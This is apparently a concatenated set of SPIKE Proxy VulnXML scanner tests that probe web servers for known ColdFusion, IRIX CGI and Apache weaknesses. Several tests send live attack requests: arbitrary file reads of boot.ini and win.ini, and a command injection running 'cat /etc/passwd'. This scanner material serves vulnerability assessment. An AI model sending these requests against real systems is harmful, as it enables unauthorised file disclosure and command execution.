^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-587.xml0100664000076500007650000000716007566204543017574 0ustar davedave (index.cfm) "susceptible to ODBC/pipe-style exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfappman/index.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-588.xml0100664000076500007650000000706307566204543017577 0ustar davedave (cfcache.map) "May leak directy listing 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/cfcache.map HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Mapping 200 Mapping 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-589.xml0100664000076500007650000000714407566204543017600 0ustar davedave (cfmlsyntaxcheck.cfm) "can be used for a DoS on the server by requesting it check all .exe's" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-58.xml0100664000076500007650000000725507566204543017512 0ustar davedave (index.html.var) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.var HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-590.xml0100664000076500007650000000724007566204543017565 0ustar davedave (exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini) "Allows attacker to view arbitrary files" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-591.xml0100664000076500007650000000712507566204543017570 0ustar davedave (exampleapp/email/application.cfm) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/exampleapp/email/application.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-592.xml0100664000076500007650000000723007566204543017566 0ustar davedave (exampleapp/email/getfile.cfm?filename=c:\boot.ini) "Allows attacker to view arbitrary files" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-593.xml0100664000076500007650000000714307566204543017572 0ustar davedave (exampleapp/publish/admin/addcontent.cfm) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-594.xml0100664000076500007650000000714507566204543017575 0ustar davedave (exampleapp/publish/admin/application.cfm) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/exampleapp/publish/admin/application.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-595.xml0100664000076500007650000000721707566204543017576 0ustar davedave (examples/cvbeans/beaninfo.cfm) "susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-596.xml0100664000076500007650000000713207566204543017573 0ustar davedave (examples/httpclient/mainframeset.cfm) "This might be interesting" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/examples/httpclient/mainframeset.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-597.xml0100664000076500007650000000720707566204543017577 0ustar davedave (examples/parks/detail.cfm) "susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/examples/parks/detail.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-598.xml0100664000076500007650000000707607566204543017604 0ustar davedave (expeval/displayopenedfile.cfm) "Unknown vul" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-599.xml0100664000076500007650000000722107566204543017575 0ustar davedave (expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini) "Allows attacker to view arbitrary files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-59.xml0100664000076500007650000000724307566204543017510 0ustar davedave (lpt9) "Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /lpt9 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ FileNotFoundException\: 200 FileNotFoundException\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-600.xml0100664000076500007650000000705407566204543017560 0ustar davedave (expeval/openfile.cfm) "Unknown vul" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/expeval/openfile.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-601.xml0100664000076500007650000000713707566204543017563 0ustar davedave (expeval/sendmail.cfm) "can be used to send email; go to the page and fill in the form" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/expeval/sendmail.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-602.xml0100664000076500007650000000710207566204543017554 0ustar davedave (snippets/evaluate.cfm) "can enter CF code to be evaluated 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/snippets/evaluate.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-603.xml0100664000076500007650000000720107566204543017555 0ustar davedave (snippets/fileexists.cfm) "can be used to verify the existance of files (on the same drive info as the web tree/file)" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/snippets/fileexists.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-604.xml0100664000076500007650000000710507566204543017561 0ustar davedave (snippets/gettempdirectory.cfm) "depending on install 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/snippets/gettempdirectory.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-605.xml0100664000076500007650000000711207566204543017560 0ustar davedave (snippets/viewexample.cfm) "this can be used to view .cfm files 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfdocs/snippets/viewexample.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-606.xml0100664000076500007650000000733607566204543017571 0ustar davedave (index.cfm) "Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /CFIDE/administrator/index.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ PasswordProvided 200 PasswordProvided 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-607.xml0100664000076500007650000000730307566204543017564 0ustar davedave (/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini) "The ColdFusion install allows attackers to read arbitrary files remotely" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [fonts] 200 [fonts] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-608.xml0100664000076500007650000000727707566204543017577 0ustar davedave (/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini) "The ColdFusion install allows attackers to read arbitrary files remotely" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [fonts] 200 [fonts] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-609.xml0100664000076500007650000000724207566204543017570 0ustar davedave (printenv) "SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin-sdb/printenv HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ /usr/bin/perl 200 /usr/bin/perl 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-60.xml0100664000076500007650000000717707566204543017506 0ustar davedave (server-info) "This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /server-info HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-610.xml0100664000076500007650000000723507566204543017562 0ustar davedave (handler/netsonar;cat /etc/passwd|?data=Dowload) "comes with IRIX 5.3 - 6.4; allows to run arbitrary commands" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/handler/netsonar;cat /etc/passwd|?data=Dowload HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-611.xml0100664000076500007650000000721707566204543017563 0ustar davedave (.cobalt/siteUserMod/siteUserMod.cgi) "Older versions of this CGI allow any user to change the administrator password." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-612.xml0100664000076500007650000000704707566204543017565 0ustar davedave (bigconf.cgi) "BigIP Configuration CGI" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/bigconf.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-613.xml0100664000076500007650000000712607566204543017564 0ustar davedave (common/listrec.pl) "This CGI allows attackers to execute commands on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/common/listrec.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-614.xml0100664000076500007650000000706207566204543017564 0ustar davedave (dbmlparser.exe) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/dbmlparser.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-615.xml0100664000076500007650000000710307566204543017561 0ustar davedave (handler) "comes with IRIX 5.3 - 6.4; allows to run arbitrary commands" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/handler HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-616.xml0100664000076500007650000000703607566204543017567 0ustar davedave (icat) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/icat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-617.xml0100664000076500007650000000707107566204543017567 0ustar davedave (MachineInfo) "gives out information on the machine (IRIX) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/MachineInfo HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-618.xml0100664000076500007650000000711507566204543017567 0ustar davedave (pfdisplay.cgi) "comes with IRIX 6.2-6.4; allows to run arbitrary commands" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/pfdisplay.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-619.xml0100664000076500007650000000711307566204543017566 0ustar davedave (webdist.cgi) "comes with IRIX 5.0 - 6.3; allows to run arbitrary commands" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/webdist.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to 